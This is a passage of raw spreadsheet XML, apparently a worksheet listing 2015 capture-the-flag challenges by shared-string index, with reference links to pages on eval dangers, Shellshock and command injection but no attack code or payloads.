      <c r="ABZ114" s="105"/>
      <c r="ACA114" s="105"/>
      <c r="ACB114" s="105"/>
      <c r="ACC114" s="105"/>
      <c r="ACD114" s="105"/>
      <c r="ACE114" s="105"/>
      <c r="ACF114" s="105"/>
      <c r="ACG114" s="105"/>
      <c r="ACH114" s="105"/>
      <c r="ACI114" s="105"/>
      <c r="ACJ114" s="105"/>
      <c r="ACK114" s="105"/>
      <c r="ACL114" s="105"/>
      <c r="ACM114" s="105"/>
      <c r="ACN114" s="105"/>
      <c r="ACO114" s="105"/>
      <c r="ACP114" s="105"/>
      <c r="ACQ114" s="105"/>
      <c r="ACR114" s="105"/>
      <c r="ACS114" s="105"/>
      <c r="ACT114" s="105"/>
      <c r="ACU114" s="105"/>
      <c r="ACV114" s="105"/>
      <c r="ACW114" s="105"/>
      <c r="ACX114" s="105"/>
      <c r="ACY114" s="105"/>
      <c r="ACZ114" s="105"/>
      <c r="ADA114" s="105"/>
      <c r="ADB114" s="105"/>
      <c r="ADC114" s="105"/>
      <c r="ADD114" s="105"/>
      <c r="ADE114" s="105"/>
      <c r="ADF114" s="105"/>
      <c r="ADG114" s="105"/>
      <c r="ADH114" s="105"/>
      <c r="ADI114" s="105"/>
      <c r="ADJ114" s="105"/>
      <c r="ADK114" s="105"/>
      <c r="ADL114" s="105"/>
      <c r="ADM114" s="105"/>
      <c r="ADN114" s="105"/>
      <c r="ADO114" s="105"/>
      <c r="ADP114" s="105"/>
      <c r="ADQ114" s="105"/>
      <c r="ADR114" s="105"/>
      <c r="ADS114" s="105"/>
      <c r="ADT114" s="105"/>
      <c r="ADU114" s="105"/>
      <c r="ADV114" s="105"/>
      <c r="ADW114" s="105"/>
      <c r="ADX114" s="105"/>
      <c r="ADY114" s="105"/>
      <c r="ADZ114" s="105"/>
      <c r="AEA114" s="105"/>
      <c r="AEB114" s="105"/>
      <c r="AEC114" s="105"/>
      <c r="AED114" s="105"/>
      <c r="AEE114" s="105"/>
      <c r="AEF114" s="105"/>
      <c r="AEG114" s="105"/>
      <c r="AEH114" s="105"/>
      <c r="AEI114" s="105"/>
      <c r="AEJ114" s="105"/>
      <c r="AEK114" s="105"/>
      <c r="AEL114" s="105"/>
      <c r="AEM114" s="105"/>
      <c r="AEN114" s="105"/>
      <c r="AEO114" s="105"/>
      <c r="AEP114" s="105"/>
      <c r="AEQ114" s="105"/>
      <c r="AER114" s="105"/>
      <c r="AES114" s="105"/>
      <c r="AET114" s="105"/>
      <c r="AEU114" s="105"/>
      <c r="AEV114" s="105"/>
      <c r="AEW114" s="105"/>
      <c r="AEX114" s="105"/>
      <c r="AEY114" s="105"/>
      <c r="AEZ114" s="105"/>
      <c r="AFA114" s="105"/>
      <c r="AFB114" s="105"/>
      <c r="AFC114" s="105"/>
      <c r="AFD114" s="105"/>
      <c r="AFE114" s="105"/>
      <c r="AFF114" s="105"/>
      <c r="AFG114" s="105"/>
      <c r="AFH114" s="105"/>
      <c r="AFI114" s="105"/>
      <c r="AFJ114" s="105"/>
      <c r="AFK114" s="105"/>
      <c r="AFL114" s="105"/>
      <c r="AFM114" s="105"/>
      <c r="AFN114" s="105"/>
      <c r="AFO114" s="105"/>
      <c r="AFP114" s="105"/>
      <c r="AFQ114" s="105"/>
      <c r="AFR114" s="105"/>
      <c r="AFS114" s="105"/>
      <c r="AFT114" s="105"/>
      <c r="AFU114" s="105"/>
      <c r="AFV114" s="105"/>
      <c r="AFW114" s="105"/>
      <c r="AFX114" s="105"/>
      <c r="AFY114" s="105"/>
      <c r="AFZ114" s="105"/>
      <c r="AGA114" s="105"/>
      <c r="AGB114" s="105"/>
      <c r="AGC114" s="105"/>
      <c r="AGD114" s="105"/>
      <c r="AGE114" s="105"/>
      <c r="AGF114" s="105"/>
      <c r="AGG114" s="105"/>
      <c r="AGH114" s="105"/>
      <c r="AGI114" s="105"/>
      <c r="AGJ114" s="105"/>
      <c r="AGK114" s="105"/>
      <c r="AGL114" s="105"/>
      <c r="AGM114" s="105"/>
      <c r="AGN114" s="105"/>
      <c r="AGO114" s="105"/>
      <c r="AGP114" s="105"/>
      <c r="AGQ114" s="105"/>
      <c r="AGR114" s="105"/>
      <c r="AGS114" s="105"/>
      <c r="AGT114" s="105"/>
      <c r="AGU114" s="105"/>
      <c r="AGV114" s="105"/>
      <c r="AGW114" s="105"/>
      <c r="AGX114" s="105"/>
      <c r="AGY114" s="105"/>
      <c r="AGZ114" s="105"/>
      <c r="AHA114" s="105"/>
      <c r="AHB114" s="105"/>
      <c r="AHC114" s="105"/>
      <c r="AHD114" s="105"/>
      <c r="AHE114" s="105"/>
      <c r="AHF114" s="105"/>
      <c r="AHG114" s="105"/>
      <c r="AHH114" s="105"/>
      <c r="AHI114" s="105"/>
      <c r="AHJ114" s="105"/>
      <c r="AHK114" s="105"/>
      <c r="AHL114" s="105"/>
      <c r="AHM114" s="105"/>
      <c r="AHN114" s="105"/>
      <c r="AHO114" s="105"/>
      <c r="AHP114" s="105"/>
      <c r="AHQ114" s="105"/>
      <c r="AHR114" s="105"/>
      <c r="AHS114" s="105"/>
      <c r="AHT114" s="105"/>
      <c r="AHU114" s="105"/>
      <c r="AHV114" s="105"/>
      <c r="AHW114" s="105"/>
      <c r="AHX114" s="105"/>
      <c r="AHY114" s="105"/>
      <c r="AHZ114" s="105"/>
      <c r="AIA114" s="105"/>
      <c r="AIB114" s="105"/>
      <c r="AIC114" s="105"/>
      <c r="AID114" s="105"/>
      <c r="AIE114" s="105"/>
      <c r="AIF114" s="105"/>
      <c r="AIG114" s="105"/>
      <c r="AIH114" s="105"/>
      <c r="AII114" s="105"/>
      <c r="AIJ114" s="105"/>
      <c r="AIK114" s="105"/>
      <c r="AIL114" s="105"/>
      <c r="AIM114" s="105"/>
      <c r="AIN114" s="105"/>
      <c r="AIO114" s="105"/>
      <c r="AIP114" s="105"/>
      <c r="AIQ114" s="105"/>
      <c r="AIR114" s="105"/>
      <c r="AIS114" s="105"/>
      <c r="AIT114" s="105"/>
      <c r="AIU114" s="105"/>
      <c r="AIV114" s="105"/>
      <c r="AIW114" s="105"/>
      <c r="AIX114" s="105"/>
      <c r="AIY114" s="105"/>
      <c r="AIZ114" s="105"/>
      <c r="AJA114" s="105"/>
      <c r="AJB114" s="105"/>
      <c r="AJC114" s="105"/>
      <c r="AJD114" s="105"/>
      <c r="AJE114" s="105"/>
      <c r="AJF114" s="105"/>
      <c r="AJG114" s="105"/>
      <c r="AJH114" s="105"/>
      <c r="AJI114" s="105"/>
      <c r="AJJ114" s="105"/>
      <c r="AJK114" s="105"/>
      <c r="AJL114" s="105"/>
      <c r="AJM114" s="105"/>
      <c r="AJN114" s="105"/>
      <c r="AJO114" s="105"/>
      <c r="AJP114" s="105"/>
      <c r="AJQ114" s="105"/>
      <c r="AJR114" s="105"/>
      <c r="AJS114" s="105"/>
      <c r="AJT114" s="105"/>
      <c r="AJU114" s="105"/>
      <c r="AJV114" s="105"/>
      <c r="AJW114" s="105"/>
      <c r="AJX114" s="105"/>
      <c r="AJY114" s="105"/>
      <c r="AJZ114" s="105"/>
      <c r="AKA114" s="105"/>
      <c r="AKB114" s="105"/>
      <c r="AKC114" s="105"/>
      <c r="AKD114" s="105"/>
      <c r="AKE114" s="105"/>
      <c r="AKF114" s="105"/>
      <c r="AKG114" s="105"/>
      <c r="AKH114" s="105"/>
      <c r="AKI114" s="105"/>
      <c r="AKJ114" s="105"/>
      <c r="AKK114" s="105"/>
      <c r="AKL114" s="105"/>
      <c r="AKM114" s="105"/>
      <c r="AKN114" s="105"/>
      <c r="AKO114" s="105"/>
      <c r="AKP114" s="105"/>
      <c r="AKQ114" s="105"/>
      <c r="AKR114" s="105"/>
      <c r="AKS114" s="105"/>
      <c r="AKT114" s="105"/>
      <c r="AKU114" s="105"/>
      <c r="AKV114" s="105"/>
      <c r="AKW114" s="105"/>
      <c r="AKX114" s="105"/>
      <c r="AKY114" s="105"/>
      <c r="AKZ114" s="105"/>
      <c r="ALA114" s="105"/>
      <c r="ALB114" s="105"/>
      <c r="ALC114" s="105"/>
      <c r="ALD114" s="105"/>
      <c r="ALE114" s="105"/>
      <c r="ALF114" s="105"/>
      <c r="ALG114" s="105"/>
      <c r="ALH114" s="105"/>
      <c r="ALI114" s="105"/>
      <c r="ALJ114" s="105"/>
      <c r="ALK114" s="105"/>
      <c r="ALL114" s="105"/>
      <c r="ALM114" s="105"/>
      <c r="ALN114" s="105"/>
      <c r="ALO114" s="105"/>
      <c r="ALP114" s="105"/>
      <c r="ALQ114" s="105"/>
      <c r="ALR114" s="105"/>
      <c r="ALS114" s="105"/>
      <c r="ALT114" s="105"/>
      <c r="ALU114" s="105"/>
      <c r="ALV114" s="105"/>
      <c r="ALW114" s="105"/>
      <c r="ALX114" s="105"/>
      <c r="ALY114" s="105"/>
      <c r="ALZ114" s="105"/>
      <c r="AMA114" s="105"/>
      <c r="AMB114" s="105"/>
      <c r="AMC114" s="105"/>
      <c r="AMD114" s="105"/>
      <c r="AME114" s="105"/>
      <c r="AMF114" s="105"/>
      <c r="AMG114" s="105"/>
      <c r="AMH114" s="105"/>
      <c r="AMI114" s="105"/>
      <c r="AMJ114" s="105"/>
      <c r="AMK114" s="105"/>
    </row>
    <row r="115">
      <c r="A115" s="109" t="s">
        <v>1677</v>
      </c>
      <c r="B115" s="126">
        <v>2015.0</v>
      </c>
      <c r="C115" s="109" t="s">
        <v>1680</v>
      </c>
      <c r="D115" s="109" t="s">
        <v>23</v>
      </c>
      <c r="E115" s="109" t="s">
        <v>1681</v>
      </c>
      <c r="F115" s="127" t="s">
        <v>1682</v>
      </c>
      <c r="G115" s="127" t="s">
        <v>1686</v>
      </c>
      <c r="H115" s="128"/>
    </row>
    <row r="116">
      <c r="A116" s="30" t="s">
        <v>1677</v>
      </c>
      <c r="B116" s="31">
        <v>2015.0</v>
      </c>
      <c r="C116" s="30" t="s">
        <v>1689</v>
      </c>
      <c r="D116" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E116" s="30" t="s">
        <v>1681</v>
      </c>
      <c r="F116" s="35" t="s">
        <v>1690</v>
      </c>
      <c r="G116" s="35" t="s">
        <v>1691</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B117" s="31">
        <v>2015.0</v>
      </c>
      <c r="C117" s="30" t="s">
        <v>1695</v>
      </c>
      <c r="D117" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E117" s="30" t="s">
        <v>1681</v>
      </c>
      <c r="F117" s="35" t="s">
        <v>1697</v>
      </c>
      <c r="G117" s="35" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B118" s="31">
        <v>2015.0</v>
      </c>
      <c r="C118" s="30" t="s">
        <v>1702</v>
      </c>
      <c r="D118" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E118" s="35" t="s">
        <v>676</v>
      </c>
      <c r="F118" s="35" t="s">
        <v>1704</v>
      </c>
      <c r="G118" s="35" t="s">
        <v>1705</v>
      </c>
      <c r="H118" s="30" t="s">
        <v>1706</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B119" s="31">
        <v>2015.0</v>
      </c>
      <c r="C119" s="30" t="s">
        <v>1713</v>
      </c>
      <c r="D119" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E119" s="35" t="s">
        <v>676</v>
      </c>
      <c r="F119" s="35" t="s">
        <v>1715</v>
      </c>
      <c r="G119" s="35" t="s">
        <v>1716</v>
      </c>
      <c r="H119" s="30" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B120" s="31">
        <v>2015.0</v>
      </c>
      <c r="C120" s="30" t="s">
        <v>1723</v>
      </c>
      <c r="D120" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E120" s="35" t="s">
        <v>676</v>
      </c>
      <c r="F120" s="35" t="s">
        <v>1724</v>
      </c>
      <c r="G120" s="35" t="s">
        <v>1726</v>
      </c>
      <c r="H120" s="30" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B121" s="31">
        <v>2015.0</v>
      </c>
      <c r="C121" s="30" t="s">
        <v>1729</v>
      </c>
      <c r="D121" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E121" s="35" t="s">
        <v>676</v>
      </c>
      <c r="F121" s="35" t="s">
        <v>1731</v>
      </c>
      <c r="G121" s="35" t="s">
        <v>1733</v>
      </c>
      <c r="H121" s="30" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B122" s="31">
        <v>2015.0</v>
      </c>
      <c r="C122" s="30" t="s">
        <v>1737</v>
      </c>
      <c r="D122" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E122" s="35" t="s">
        <v>676</v>
      </c>
      <c r="F122" s="35" t="s">
        <v>1739</v>
      </c>
      <c r="G122" s="30" t="s">
        <v>1740</v>
      </c>
      <c r="H122" s="30" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B123" s="31">
        <v>2015.0</v>
      </c>
      <c r="C123" s="30" t="s">
        <v>1744</v>
      </c>
      <c r="D123" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E123" s="35" t="s">
        <v>407</v>
      </c>
      <c r="F123" s="35" t="s">
        <v>1745</v>
      </c>
      <c r="G123" s="30" t="s">
        <v>1746</v>
      </c>
      <c r="H123" s="30" t="s">
        <v>1455</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B124" s="31">
        <v>2015.0</v>
      </c>
      <c r="C124" s="30" t="s">
        <v>1747</v>
      </c>
      <c r="D124" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E124" s="35" t="s">
        <v>407</v>
      </c>
      <c r="F124" s="35" t="s">
        <v>1748</v>
      </c>
      <c r="G124" s="30" t="s">
        <v>1749</v>
      </c>
      <c r="H124" s="33" t="s">
        <v>1751</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="109" t="s">
        <v>1540</v>
      </c>
      <c r="B125" s="126">
        <v>2015.0</v>
      </c>
      <c r="C125" s="109" t="s">
        <v>1757</v>
      </c>
      <c r="D125" s="109" t="s">
        <v>23</v>
      </c>
      <c r="E125" s="109" t="s">
        <v>1681</v>
      </c>
      <c r="F125" s="127" t="s">
        <v>1758</v>
      </c>
      <c r="G125" s="127" t="s">
        <v>1759</v>
      </c>
      <c r="H125" s="109"/>
    </row>
    <row r="126">
      <c r="A126" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B126" s="31">
        <v>2015.0</v>
      </c>
      <c r="C126" s="30" t="s">
        <v>1764</v>
      </c>
      <c r="D126" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E126" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F126" s="35" t="s">
        <v>1765</v>
      </c>
      <c r="G126" s="30" t="s">
        <v>1766</v>
      </c>
      <c r="H126" s="33" t="str">
        <f>HYPERLINK("http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html","Eval is really dangerous")</f>
        <v>Eval is really dangerous</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="109" t="s">
        <v>1540</v>
      </c>
      <c r="B127" s="126">
        <v>2015.0</v>
      </c>
      <c r="C127" s="109" t="s">
        <v>1774</v>
      </c>
      <c r="D127" s="109" t="s">
        <v>48</v>
      </c>
      <c r="E127" s="109" t="s">
        <v>1775</v>
      </c>
      <c r="F127" s="127" t="s">
        <v>1776</v>
      </c>
      <c r="G127" s="127" t="s">
        <v>1777</v>
      </c>
      <c r="H127" s="129" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Shellshock_(software_bug)","Shellshock vuln")</f>
        <v>Shellshock vuln</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="30" t="s">
        <v>1540</v>
      </c>
      <c r="B128" s="31">
        <v>2015.0</v>
      </c>
      <c r="C128" s="30" t="s">
        <v>1780</v>
      </c>
      <c r="D128" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E128" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F128" s="35" t="s">
        <v>1781</v>
      </c>
      <c r="G128" s="35" t="s">
        <v>1782</v>
      </c>
      <c r="H128" s="30"/>
    </row>
    <row r="129">
      <c r="A129" s="109" t="s">
        <v>1540</v>
      </c>
      <c r="B129" s="126">
        <v>2015.0</v>
      </c>
      <c r="C129" s="109" t="s">
        <v>1784</v>
      </c>
      <c r="D129" s="109" t="s">
        <v>23</v>
      </c>
      <c r="E129" s="109" t="s">
        <v>1785</v>
      </c>
      <c r="F129" s="127" t="s">
        <v>1748</v>
      </c>
      <c r="G129" s="109" t="s">
        <v>1749</v>
      </c>
      <c r="H129" s="128"/>
    </row>
    <row r="130">
      <c r="A130" s="30" t="s">
        <v>800</v>
      </c>
      <c r="B130" s="31">
        <v>2015.0</v>
      </c>
      <c r="C130" s="30" t="s">
        <v>1786</v>
      </c>
      <c r="D130" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E130" s="30" t="s">
        <v>1787</v>
      </c>
      <c r="F130" s="35" t="s">
        <v>1788</v>
      </c>
      <c r="G130" s="48" t="s">
        <v>1789</v>
      </c>
      <c r="H130" s="33" t="s">
        <v>1790</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="17">
        <v>42542.0</v>
      </c>
      <c r="B131" s="7"/>
      <c r="C131" s="6"/>
      <c r="D131" s="6"/>
      <c r="E131" s="6"/>
      <c r="F131" s="6"/>
      <c r="G131" s="6"/>
      <c r="H131" s="6"/>
      <c r="I131" s="8"/>
      <c r="J131" s="8"/>
      <c r="K131" s="9"/>
      <c r="L131" s="9"/>
      <c r="M131" s="9"/>
      <c r="N131" s="9"/>
      <c r="O131" s="9"/>
      <c r="P131" s="9"/>
      <c r="Q131" s="9"/>
      <c r="R131" s="9"/>
      <c r="S131" s="9"/>
      <c r="T131" s="9"/>
      <c r="U131" s="9"/>
      <c r="V131" s="9"/>
      <c r="W131" s="9"/>
      <c r="X131" s="9"/>
      <c r="Y131" s="9"/>
      <c r="Z131" s="9"/>
    </row>
    <row r="132">
      <c r="A132" s="37">
        <v>9447.0</v>
      </c>
      <c r="B132" s="40">
        <v>2015.0</v>
      </c>
      <c r="C132" s="40" t="s">
        <v>1800</v>
      </c>
      <c r="D132" s="40" t="s">
        <v>128</v>
      </c>
      <c r="F132" s="40" t="s">
        <v>1801</v>
      </c>
      <c r="G132" s="40" t="s">
        <v>1803</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="37">
        <v>9447.0</v>
      </c>
      <c r="B133" s="40">
        <v>2015.0</v>
      </c>
      <c r="C133" s="40" t="s">
        <v>1804</v>
      </c>
      <c r="D133" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E133" s="40" t="s">
        <v>1805</v>
      </c>
      <c r="F133" s="40" t="s">
        <v>1806</v>
      </c>
      <c r="G133" s="40" t="s">
        <v>1808</v>
      </c>
      <c r="H133" s="40" t="s">
        <v>1809</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="37">
        <v>9447.0</v>
      </c>
      <c r="B134" s="40">
        <v>2015.0</v>
      </c>
      <c r="C134" s="40" t="s">
        <v>1811</v>
      </c>
      <c r="D134" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E134" s="40" t="s">
        <v>1805</v>
      </c>
      <c r="F134" s="40" t="s">
        <v>1812</v>
      </c>
      <c r="G134" s="40" t="s">
        <v>1813</v>
      </c>
      <c r="H134" s="92" t="s">
        <v>1814</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B135" s="31">
        <v>2015.0</v>
      </c>
      <c r="C135" s="30" t="s">
        <v>1821</v>
      </c>
      <c r="D135" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E135" s="30" t="s">
        <v>1787</v>
      </c>
      <c r="F135" s="35" t="s">
        <v>1823</v>
      </c>
      <c r="G135" s="30" t="s">
        <v>1824</v>
      </c>
      <c r="H135" s="33" t="str">
        <f>HYPERLINK("https://www.owasp.org/index.php/Command_Injection","Command Line Injection")</f>
        <v>Command Line Injection</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B136" s="31">
        <v>2015.0</v>
      </c>
      <c r="C136" s="30" t="s">
        <v>1827</v>
      </c>
      <c r="D136" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E136" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F136" s="35" t="s">
        <v>1828</v>
      </c>
      <c r="G136" s="30" t="s">
        <v>1829</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="30" t="s">
        <v>1011</v>
      </c>
      <c r="B137" s="31">
        <v>2015.0</v>
      </c>
      <c r="C137" s="30" t="s">
        <v>1830</v>
      </c>
      <c r="D137" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E137" s="30" t="s">
        <v>1831</v>
      </c>
      <c r="F137" s="35" t="s">
        <v>1832</v>
      </c>
      <c r="G137" s="30" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="17">
        <v>42545.0</v>
      </c>
      <c r="B138" s="7"/>
      <c r="C138" s="6"/>
      <c r="D138" s="6"/>
      <c r="E138" s="6"/>
      <c r="F138" s="6"/>
      <c r="G138" s="6"/>
      <c r="H138" s="6"/>
      <c r="I138" s="8"/>
      <c r="J138" s="8"/>
      <c r="K138" s="9"/>
      <c r="L138" s="9"/>
      <c r="M138" s="9"/>
      <c r="N138" s="9"/>
      <c r="O138" s="9"/>
      <c r="P138" s="9"/>
      <c r="Q138" s="9"/>
      <c r="R138" s="9"/>
      <c r="S138" s="9"/>
      <c r="T138" s="9"/>
      <c r="U138" s="9"/>
      <c r="V138" s="9"/>
      <c r="W138" s="9"/>
      <c r="X138" s="9"/>
      <c r="Y138" s="9"/>
      <c r="Z138" s="9"/>
    </row>
    <row r="139">
      <c r="A139" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B139" s="71">
        <v>2015.0</v>
      </c>
      <c r="C139" s="70" t="s">
        <v>1834</v>
      </c>
      <c r="D139" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E139" s="70" t="s">
        <v>1489</v>
      </c>
      <c r="F139" s="70" t="s">
        <v>1835</v>
      </c>
      <c r="G139" s="70" t="s">
        <v>1836</v>
      </c>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c r="BO139" s="29"/>
      <c r="BP139" s="29"/>
      <c r="BQ139" s="29"/>
      <c r="BR139" s="29"/>
      <c r="BS139" s="29"/>
      <c r="BT139" s="29"/>
      <c r="BU139" s="29"/>
      <c r="BV139" s="29"/>
      <c r="BW139" s="29"/>
      <c r="BX139" s="29"/>
      <c r="BY139" s="29"/>
      <c r="BZ139" s="29"/>
      <c r="CA139" s="29"/>
      <c r="CB139" s="29"/>
      <c r="CC139" s="29"/>
      <c r="CD139" s="29"/>
      <c r="CE139" s="29"/>
      <c r="CF139" s="29"/>
      <c r="CG139" s="29"/>
      <c r="CH139" s="29"/>
      <c r="CI139" s="29"/>
      <c r="CJ139" s="29"/>
      <c r="CK139" s="29"/>
      <c r="CL139" s="29"/>
      <c r="CM139" s="29"/>
      <c r="CN139" s="29"/>
      <c r="CO139" s="29"/>
      <c r="CP139" s="29"/>
      <c r="CQ139" s="29"/>
      <c r="CR139" s="29"/>
      <c r="CS139" s="29"/>
      <c r="CT139" s="29"/>
      <c r="CU139" s="29"/>
      <c r="CV139" s="29"/>
      <c r="CW139" s="29"/>
      <c r="CX139" s="29"/>
      <c r="CY139" s="29"/>
      <c r="CZ139" s="29"/>
      <c r="DA139" s="29"/>
      <c r="DB139" s="29"/>
      <c r="DC139" s="29"/>
      <c r="DD139" s="29"/>
      <c r="DE139" s="29"/>
      <c r="DF139" s="29"/>
      <c r="DG139" s="29"/>
      <c r="DH139" s="29"/>
      <c r="DI139" s="29"/>
      <c r="DJ139" s="29"/>
      <c r="DK139" s="29"/>
      <c r="DL139" s="29"/>
      <c r="DM139" s="29"/>
      <c r="DN139" s="29"/>
      <c r="DO139" s="29"/>
      <c r="DP139" s="29"/>
      <c r="DQ139" s="29"/>
      <c r="DR139" s="29"/>
      <c r="DS139" s="29"/>
      <c r="DT139" s="29"/>
      <c r="DU139" s="29"/>
      <c r="DV139" s="29"/>
      <c r="DW139" s="29"/>
      <c r="DX139" s="29"/>
      <c r="DY139" s="29"/>
      <c r="DZ139" s="29"/>
      <c r="EA139" s="29"/>
      <c r="EB139" s="29"/>
      <c r="EC139" s="29"/>
      <c r="ED139" s="29"/>
      <c r="EE139" s="29"/>
      <c r="EF139" s="29"/>
      <c r="EG139" s="29"/>
      <c r="EH139" s="29"/>
      <c r="EI139" s="29"/>
      <c r="EJ139" s="29"/>
      <c r="EK139" s="29"/>
      <c r="EL139" s="29"/>
      <c r="EM139" s="29"/>
      <c r="EN139" s="29"/>
      <c r="EO139" s="29"/>
      <c r="EP139" s="29"/>
      <c r="EQ139" s="29"/>
      <c r="ER139" s="29"/>
      <c r="ES139" s="29"/>
      <c r="ET139" s="29"/>
      <c r="EU139" s="29"/>
      <c r="EV139" s="29"/>
      <c r="EW139" s="29"/>
      <c r="EX139" s="29"/>
      <c r="EY139" s="29"/>
      <c r="EZ139" s="29"/>
      <c r="FA139" s="29"/>
      <c r="FB139" s="29"/>
      <c r="FC139" s="29"/>
      <c r="FD139" s="29"/>
      <c r="FE139" s="29"/>
      <c r="FF139" s="29"/>
      <c r="FG139" s="29"/>
      <c r="FH139" s="29"/>
      <c r="FI139" s="29"/>
      <c r="FJ139" s="29"/>
      <c r="FK139" s="29"/>
      <c r="FL139" s="29"/>
      <c r="FM139" s="29"/>
      <c r="FN139" s="29"/>
      <c r="FO139" s="29"/>
      <c r="FP139" s="29"/>
      <c r="FQ139" s="29"/>
      <c r="FR139" s="29"/>
      <c r="FS139" s="29"/>
      <c r="FT139" s="29"/>
      <c r="FU139" s="29"/>
      <c r="FV139" s="29"/>
      <c r="FW139" s="29"/>
      <c r="FX139" s="29"/>
      <c r="FY139" s="29"/>
      <c r="FZ139" s="29"/>
      <c r="GA139" s="29"/>
      <c r="GB139" s="29"/>
      <c r="GC139" s="29"/>
      <c r="GD139" s="29"/>
      <c r="GE139" s="29"/>
      <c r="GF139" s="29"/>
      <c r="GG139" s="29"/>
      <c r="GH139" s="29"/>
      <c r="GI139" s="29"/>
      <c r="GJ139" s="29"/>
      <c r="GK139" s="29"/>
      <c r="GL139" s="29"/>
      <c r="GM139" s="29"/>
      <c r="GN139" s="29"/>
      <c r="GO139" s="29"/>
      <c r="GP139" s="29"/>
      <c r="GQ139" s="29"/>
      <c r="GR139" s="29"/>
      <c r="GS139" s="29"/>
      <c r="GT139" s="29"/>
      <c r="GU139" s="29"/>
      <c r="GV139" s="29"/>
      <c r="GW139" s="29"/>
      <c r="GX139" s="29"/>
      <c r="GY139" s="29"/>
      <c r="GZ139" s="29"/>
      <c r="HA139" s="29"/>
      <c r="HB139" s="29"/>
      <c r="HC139" s="29"/>
      <c r="HD139" s="29"/>
      <c r="HE139" s="29"/>
      <c r="HF139" s="29"/>
      <c r="HG139" s="29"/>
      <c r="HH139" s="29"/>
      <c r="HI139" s="29"/>
      <c r="HJ139" s="29"/>
      <c r="HK139" s="29"/>
      <c r="HL139" s="29"/>
      <c r="HM139" s="29"/>
      <c r="HN139" s="29"/>
      <c r="HO139" s="29"/>
      <c r="HP139" s="29"/>
      <c r="HQ139" s="29"/>
      <c r="HR139" s="29"/>
      <c r="HS139" s="29"/>
      <c r="HT139" s="29"/>
      <c r="HU139" s="29"/>
      <c r="HV139" s="29"/>
      <c r="HW139" s="29"/>
      <c r="HX139" s="29"/>
      <c r="HY139" s="29"/>
      <c r="HZ139" s="29"/>
      <c r="IA139" s="29"/>
      <c r="IB139" s="29"/>
      <c r="IC139" s="29"/>
      <c r="ID139" s="29"/>
      <c r="IE139" s="29"/>
      <c r="IF139" s="29"/>
      <c r="IG139" s="29"/>
      <c r="IH139" s="29"/>
      <c r="II139" s="29"/>
      <c r="IJ139" s="29"/>
      <c r="IK139" s="29"/>
      <c r="IL139" s="29"/>
      <c r="IM139" s="29"/>
      <c r="IN139" s="29"/>
      <c r="IO139" s="29"/>
      <c r="IP139" s="29"/>
      <c r="IQ139" s="29"/>
      <c r="IR139" s="29"/>
      <c r="IS139" s="29"/>
      <c r="IT139" s="29"/>
      <c r="IU139" s="29"/>
      <c r="IV139" s="29"/>
      <c r="IW139" s="29"/>
      <c r="IX139" s="29"/>
      <c r="IY139" s="29"/>
      <c r="IZ139" s="29"/>
      <c r="JA139" s="29"/>
      <c r="JB139" s="29"/>
      <c r="JC139" s="29"/>
      <c r="JD139" s="29"/>
      <c r="JE139" s="29"/>
      <c r="JF139" s="29"/>
      <c r="JG139" s="29"/>
      <c r="JH139" s="29"/>
      <c r="JI139" s="29"/>
      <c r="JJ139" s="29"/>
      <c r="JK139" s="29"/>
      <c r="JL139" s="29"/>
      <c r="JM139" s="29"/>
      <c r="JN139" s="29"/>
      <c r="JO139" s="29"/>
      <c r="JP139" s="29"/>
      <c r="JQ139" s="29"/>
      <c r="JR139" s="29"/>
      <c r="JS139" s="29"/>
      <c r="JT139" s="29"/>
      <c r="JU139" s="29"/>
      <c r="JV139" s="29"/>
      <c r="JW139" s="29"/>
      <c r="JX139" s="29"/>
      <c r="JY139" s="29"/>
